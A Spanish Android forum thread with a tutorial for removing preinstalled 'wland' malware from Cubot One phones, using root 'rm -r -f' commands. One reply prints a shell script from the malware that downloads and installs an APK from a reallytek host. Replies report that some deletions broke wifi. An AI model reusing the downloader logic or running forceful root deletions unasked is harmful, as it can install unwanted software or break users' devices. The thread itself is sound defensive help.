Pulsa aquí para quitar la publicidad.

TUTORIAL [Tutorial] Eliminar malware en Cubot one: aplicaciones que se instalan solas

Tema en 'Cubot ONE MTK6589' iniciado por DanielSmith, 2 Feb 2014.

Tags:
  1. DanielSmith

    DanielSmith Simdualero Junior

      2
      2
      31 Ene 2014
      ¡Hola a todos!

      Soy nuevo aquí y aunque no haya participado nunca en esta comunidad me he registrado para poder publicar este post y ayudar a la gente que se ha encontrado con el mismo problema que yo en el Cubot One (o quizá también en otros dispositivos chinos).

      Yo también vi que empezaron a instalarse aplicaciones no solicitadas en mi Cubot One. Estas aplicaciones eran: Baidu Browser, 337 Game Master, Mobo Market, DU Battery saver entre otros. Además el periodo de instalación era bastante aleatorio y nunca sabías cuándo iba a ocurrir.

      Estaba preocupado porque tenía pensado ponerle una app de Bitcoin en el móvil, pero con ese software malicioso corriendo en mi móvil ni loco iba a ponerle dinero que, potencialmente, podría haber sido robado.

      El Malware


      Bueno el caso es que me puse a investigar y en un foro alemán encontré a unos usuarios que tenían exactamente el mismo problema con la ROM G800 que es también la que corre mi Cubot One.

      Os dejo el enlace al hilo del foro alemán: http://www.android-hilfe.de/xiaocai..._en_c1_v0-4_20130910-rom-malware-removal.html

      Bueno, pues ahí descubrieron que el culpable era una aplicación del sistema llamada "wland". Mirad en "Administrar aplicaciones > Todas" o en la carpeta /system/app para ver si teneis el Wland.

      Según el autor del hilo en el foro alemán esta aplicación es muy putas, puesto que cada hora envía una pequeña señal con nuestro IMSI y los datos de la torre telefónica a la que estamos conectados a los servidores de sus creadores (la empresa Reallytek). Estos datos, por cierto, permiten geolocalizar a alguien.

      Bueno, el caso es que entonces el servidor contesta con una respuesta vacía o con un script. Cuando responde con un script, el teléfono lo ejecuta y, en este caso, descarga una aplicación SPAM siempre y cuando estemos conectados al Wifi. Es importante notar que técnicamente esta empresa podría ejecutar cualquier código arbitrario en nuestro teléfono si le dará la gana.
      Cómo Eliminarlo

      No me hago responsable de lo que le pueda pasar al móvil si seguís estos pasos. Hacedlo bajo vuestra propia responsabilidad.
      Si no podéis seguir estos pasos, quizá baste con poner las aplicaciones en cuarentena. Haced scroll para llegar a la última sección y ver cómo hacerlo.

      1. Ser root

      2a. [opcional] Descargar el Mobileuncle Tools del App store y usarlo para instalar el CWM recovery que encontraréis aquí. Yo tengo la versión 6.0.4.4
      2b. [opcional] Con el recovery instalado, reiniciais en modo recovery y hacéis una copia de seguridad.

      3. Instalar la aplicación Titanium Backup del Play Store y usarla para eliminar el Wland.

      4. ¡Aún no hemos terminado! Wland también se encuentra en las siguientes carpetas:

      /system/bin/wland
      /system/app/wland.apk (esta es la que elimina el Titanium)
      /system/wlan/
      /data/.wlan/
      /data/data/com.wlan.wland/

      (Nótese que son carpetas del sistema, no de la tarjeta SD. Necesitaréis una aplicación tipo ES Explorer para poder verlas).

      Una vez desinstalada la app con el Titanium no tengo ni idea si esta puede seguir viva sólo con el Binario que hay en /system/bin. Mi instinto me dice que sí, así que terminé eliminando todo.

      Para eliminarlo todo necesitaremos dos APPS:
      1. Una terminal que podéis encontrar aquí.
      2. Una app para montar y desmontar el directorio /system de manera fiable. Lo podéis encontrar aquí.

      A continuación primero ejecutáis el "Mount /system" y le damos permisos de lectura y escritura (R/W) al directorio /system. Esto nos permitirá modificar su contenido.



      Enlaces Patrocinados: (regístrate o inicia sesión y no te molestarán más)

      Después, abrimos la aplicación de terminal y escribimos exactamente lo siguiente:

      su
      (esto pide permisos de root / administrador para poder modificar el sistema).
      Luego, linea por linea escribís lo siguiente. Siempre haciendo Enter después de cada línea, puesto que cada línea es un nuevo comando.

      rm -f /system/bin/wland

      rm -r -f /system/wlan/

      rm -r -f /data/.wlan/

      rm -r -f /data/data/com.wlan.wland/

      Cada uno de estos comandos es un comando de eliminación. "rm" significa "remove" y lo otro son opciones necesarias para forzar el borrado de los archivos o directorios.

      Con esto eliminaréis el Wland.

      Finalmente escribid dos veces seguidas "exit" y saldréis de la terminal. No os olvidéis de regresar al programa Mount /system y poner el directorio de vuelta en "Solo lectura" o "RO".

      Otro software sospechoso.
      ¿Pero por qué quedarnos aquí? Si queréis, y os lo recomiendo encarecidamente, aprovechad los pasos anteriores para eliminar otro software sospechoso y potencialmente malicioso de nuestro Cubot One.

      Antes de cerrar la terminar ejecutad estos comandos:

      rm -f /system/app/AmountTool.apk
      rm -r -f /data/data/com.skymobi.activation/
      rm -f /system/app/Midtest.apk
      rm -f /system/app/Midtest.odex
      rm -r -f /data/data/com.reallytek.wg/

      Esto eliminará el Amounttool o "activation service" misterioso de una empresa china y un software de testeo que curiosamente es de la misma empresa que hizo el Wland.

      ¡Y más borrado de software innecesario!
      A continuación os paso también una lista de aplicaciones del sistema que he eliminado sin que mi Cubot One deje de funcionar.

      Podéis eliminar todas estas aplicaciones con el Titanium Backup. Por si las moscas siempre podéis hacer una copia de seguridad con la misma aplicación antes de borrar nada.

      SmsReg (fue detectado en otros móviles como virus, aunque en este no parece ser malicioso. Aún así, se puede eliminar).
      MTKlogger (No me fio de que MTK, sinceramente).
      ATCI_Service (Supuestamente innecesario, pero puede causar que deje de funcionar la radio FM)
      Notpad (software de MTK, lo siento no me fio y hay apps mejores)
      Tarea Pendiente (igual que el anterior).
      Todo lo que empiece por "Fondos de pantalla".
      Launcher 3.33 (sólo si tenéis un launcher nuevo. Os recomiendo el Nova Launcher que es infinitamente mejor).
      Burbujas 1.0 (fondo de pantalla)
      Agujero negro 1.0 (fondo de pantalla)
      3D Mushroom Wallapaper (fondo de pantalla)
      Y si queréis también podéis quitar el navegador y la galería. Recomiendo el Firefox y el Quickpic para sustituírlos.

      Finalmente: poner aplicaciones en cuarentena
      Hay algunas aplicaciones de las que no me fío pero que no se pueden eliminar porque son esenciales para el sistema. Si queréis, las podéis poner el cuarentena.

      Este paso también os sirve si por cualquier razón no podéis seguir los pasos anteriores. Necesitaréis ser root, pero no hará falta hacer todo eso de la terminal.

      1. Instaláis la aplicación llamada XPrivacy siguiendo detalladamente las instrucciones de su creador.

      https://github.com/M66B/XPrivacy#installation

      Esta aplicación sirve para restringir permisos individuales de aplicaciones particulares. Con esto podremos quitarle el permiso de Internet y geolocalización a todo lo que nos parezca sospechoso.

      Yo he restringido permisos a:

      MTK Android Suite Daemon 1.1 (lo siento de nuevo, no fio de MTK después de encontrarme con cosas como el Wland).
      MTK Thermal Manager (controla la temperatura del dispositivo pero por alguna razón leí en otro foro que lo habían encontrando enviando datos ¿para qué?).
      Vcalendar (Es otra aplicación de Mediatek. Así evito que se conecte cuando no quiero).

      Seguiré experimentando y viendo si me he dejado algo puesto que tampoco soy experto en el campo.
      Hacedme un favor y rezad conmigo para que pronto salga una versión de cyanogenmod o de Replicant compatible con nuestro dispositivo.

      ¡Saludos!
       
      Última edición: 2 Feb 2014
      • Me Gusta Me Gusta x 2
      • Gracias Gracias x 2
      • Útil Útil x 1
      • toniguada

        toniguada Simdualero de Platino

          424
          118
          3 Mar 2013
          Gracias por comparir, saludos.

          Enviado desde mi MOMO11 bird usando Tapatalk 2
           
        • estabaria

          estabaria Simdualero de Bronce

            19
            2
            26 Mar 2013
            Malaga
            Muchisisisimas gracias, esto ya me estaba volviendo loca.Pensé que era algo que había instalado yo, me descargué innumerables apps para tratar de indentificar el problema, hasta que empecé a pensar que era de la rom que traia de fabrica, y así es.
            Mucha cara venderte algo con malware instalado...


            Edito para agregar que en /system/bin encontre otro fichero llamado wlan_loader, que borré sin pensarmelo dos veces.
            Y para el que entienda de programación en android (yo no mucho la verdad) les pego el codigo de uno de los tres .sh que encontré dentro de /data/.wlan:

            CODE, HTML o PHP:
            #this is used to download and install apks
            
            package=com.trustgo.mobile.security
            version=1.3.2
            apksize=4   #calculate in MB
            activity=com.trustgo.service.TrustgoService
            deadline=20140331
            wifionly=yes   #yes or no
            daemon=no
            
            url=[editada porque no me permite publicar urls el foro]
            apk=$version.apk
            api=1.1.0
            funcset=1.0.2
            host=wlans.reallytek.com
            
            wland -fsv $funcset
            . /data/.wlan/function_set.sh
            
            check_api
            check_funcset
            install_apk
            
            El wifionly=yes hace que no parezcan tan malos... :tonguewink:
             
            Última edición: 16 Feb 2014
            • Divertido Divertido x 1
            • Roberto Acuña Rojas

              Roberto Acuña Rojas Simdualero de Bronce

                38
                2
                11 Mar 2013
                A, A
                Lo hice, ojalá me resulte :smile:

                Gracias.
                 
              • jhalion

                jhalion Simdualero de Bronce

                  7
                  0
                  31 Mar 2014
                  Hola me pasa lo mismo con un clon del 5S , cada día se instalaban solas 3 o 4 apps chinas era una locura , y buscando encontré el mismo que estabaria wlan_loader entá ubicado en /system/bin
                  pero sólo encontré este . Saludos y gracias por el aporte
                  !!!! atención al quitar wlan_loader dejó de funcionar el wifi (gracias que había hecho una copia de seguridad) uff lo he instalado de nuevo, saludos
                   
                  Última edición: 4 Jul 2014
                • david_bismark

                  david_bismark Simdualero Junior

                    1
                    0
                    23 Jul 2014
                    Hola Jhalion,
                    Cierto con lo que comentas, desde que seguí este tutorial, eliminé un archivo wlan y me dejó de funcionar la wifi. El problema es que me falla la copia de seguridad, que puedo hacer? Lo he restaurado de fábrica y nada... También tengo un S5 clon.
                    Estos archivos son únicos para cada teléfono?
                     
                  • Roberto Acuña Rojas

                    Roberto Acuña Rojas Simdualero de Bronce

                      38
                      2
                      11 Mar 2013
                      A, A
                      Lo que hay que borrar es wland, no wlan.

                      Este post debería estar como sticky. El de mi novia es otro Cubot One (el rojo) que trae el procesador
                      mtk6589T (con la T final) y también tiene el mismo drama. A lo mejor es algo generalizado de esta marca. Lástima para ser tan buen fono, se puede perder mucha credibilidad con esas apps de dudosa reputación.
                       
                    • flufy_tendo

                      flufy_tendo Ajuste de nivel +5 Simdualero de Diamante

                      • Cocinero Android
                      • Veteran@
                      12.903
                      7.303
                      25 Dic 2012
                      Galicia
                      @SuperMod una chincheta por favor

                      Enviado desde mi H30-U10 mediante Tapatalk
                       
                    • Beta

                      Beta Simdualero de Diamante

                      • Miembro de Honor
                      • Veteran@
                      • Supermod Jubilado
                      58.416
                      43.541
                      1 Oct 2012
                      Madrid, Spain
                      Ya la tienes puesta, necesitas algo mas.
                       
                      • Me Gusta Me Gusta x 1
                      • flufy_tendo

                        flufy_tendo Ajuste de nivel +5 Simdualero de Diamante

                        • Cocinero Android
                        • Veteran@
                        12.903
                        7.303
                        25 Dic 2012
                        Galicia
                        Graciñas beta

                        Enviado desde mi H30-U10 mediante Tapatalk
                         
                      • sao150326

                        sao150326 Simdualero de Bronce

                          39
                          0
                          27 Jun 2013
                          Hola DanielSmith,
                          Ese problema tambien ocurre cuando el móvil está ajustado para no instalar aplicaciones de origen desconocido ?

                          []´s
                           
                        • j4ck

                          j4ck Simdualero de Plata

                            96
                            0
                            14 Oct 2013
                            Gracias por las respuestas, estaré atento por si me ocurre a mi
                            --- Comentario doble fusionado, 16 Sep 2014 ---
                            Gracias por las respuestas, estaré atento por si me ocurre a mi
                             
                          Verificación:
                          Borrador guardado Borrador eliminado

                          Compartir esta página

                          Galletas! Nos obligan a informar que utilizamos cookies (como casi todas las webs). Al continuar navegando aceptas su uso.